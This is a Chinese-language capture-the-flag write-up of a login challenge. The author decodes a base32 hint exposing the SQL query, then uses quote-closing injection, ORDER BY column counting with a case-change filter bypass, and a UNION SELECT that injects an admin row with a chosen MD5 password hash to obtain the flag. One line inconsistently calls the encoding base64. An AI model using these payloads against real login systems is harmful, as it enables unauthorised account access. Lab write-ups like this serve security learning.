拿到一个登录框
随便填些信息登录一下
这里用户名不是admin
的话会提示用户名错误,其他都提示密码错误,看来admin
就是正确用户名
可以看到返回页面有注释MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
这串字符不区分大小写,只有[A-z2-7],看来是base32
这很显然是base64
解码出来了一段sql语句:select * from user where username = '$name'
可以看到查询语句中的$name
被单引号闭合了,尝试用单引号闭合name=admin' or 1=1 -- qwe&pw=123
查字段:name=admin' order by 2 -- qwe&pw=123
存在绕过,换大写试试:name=admin' ORDER BY 4 -- qwe&pw=123
最后查出来三个字段
判断用户名所在字段:name=1' UNION SELECT 'admin',2,3 -- qwe&pw=asd
no user
,把用户名放到第二位查询:name=1' UNION SELECT 1,'admin',3 -- qwe&pw=asd
看来用户名被存在第二个字段,无法查出数据,可能后端是利用两个if
语句来验证用户名密码的
我们不知道admin的密码,这时可以随便写,当联合查询不存在的数据时,只要字段一致,数据库会将该数据与原数据合起来输出
我们可以看到,数据库不光显示了我联合查询的数据,也显示了使where
成立的数据
一般密码是使用哈希算法计算后存储在数据库中的,那么我们也可以将asd
进行哈希加密(asd是随便写的)
先试试MD5:7815696ecbf1c96e6894b779456d330e
这里的第三位要与后面密码位保持一致:name=1' UNION SELECT 1,'admin','7815696ecbf1c96e6894b779456d330e' -- qwe&pw=asd
得到:flag{b13f4d63-8b0e-47ef-aee6-a6c31fe6f091}
这道题可能也不是很难,但确实有爽到我
又一次体会到了拿到flag的乐趣!